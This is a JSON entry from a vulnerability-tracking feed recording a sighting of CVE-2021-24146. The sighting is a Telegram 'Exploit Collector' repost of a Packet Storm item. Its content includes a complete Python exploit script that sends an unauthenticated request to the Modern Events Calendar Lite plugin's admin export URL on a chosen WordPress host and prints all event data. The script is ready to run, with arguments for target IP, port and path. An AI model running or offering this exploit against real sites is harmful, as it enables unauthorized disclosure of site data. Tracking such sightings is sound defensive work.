{"uuid": "86c982fc-ae84-4cfa-a303-c625c3864509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-24146", "type": "seen", "source": "https://t.me/hacking_Attack/15135", "content": "Exploit Collector\nWordPress Modern Events Calendar 5.16.2 Information Disclosure\n\nhttps://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png \nWordPress Modern Events Calendar plugin version 5.16.2 suffers from an issue where unauthenticated parties can export all event data.\n\nMD5 | 6efc8a4724dc0a980761c66c25d05189\n\nDownload\n# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)\n# Date 01.07.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://webnus.net/modern-events-calendar/\n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip\n# Version: Before 5.16.5\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2021-24146\n# CWE: CWE-863, CWE-284\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md\n\n'''\nDescription:\nLack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,\nversions before 5.16.5, did not properly restrict access to the export files,\nallowing unauthenticated users to exports all events data in CSV or XML format for example.\n'''\n'''\nBanner:\n'''\nbanner = \"\"\"\n_______    ________    ___   ____ ___  ___     ___  __ __ _____ __  _____\n/ ____/ |  / / ____/   |__ \\ / __ \\__ \\&lt;  /    |__ \\/ // /&lt;  / // / / ___/\n/ /    | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \\ \n/ /___  | |/ / /__/_____/ __// /_/ / __// /_____/ __/__  __/ /__  __/ /_/ / \n\\____/  |___/_____/    /____/\\____/____/_/     /____/ /_/ /_/  /_/  \\____/ \n\n* WordPress Plugin Modern Events Calendar Lite &lt; 5.16.2 - Export Event Data (Unauthenticated)\n* @Hacker5preme \n\n\"\"\"\nprint(banner)\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\nimport csv\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\n'''\nExploit:\n'''\nprint('')\nprint('[+] Exported Data: ')\nprint('')\nexploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&amp;tab=MEC-export&amp;mec-ix-action=export-events&amp;format=csv'\nanswer = requests.get(exploit_url)\ndecoded_content = answer.content.decode('utf-8')\ncr = csv.reader(decoded_content.splitlines(), delimiter=',')\nmy_list = list(cr)\nfor row in my_list:\nprint(row)\n\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-02T01:03:09.048476Z"}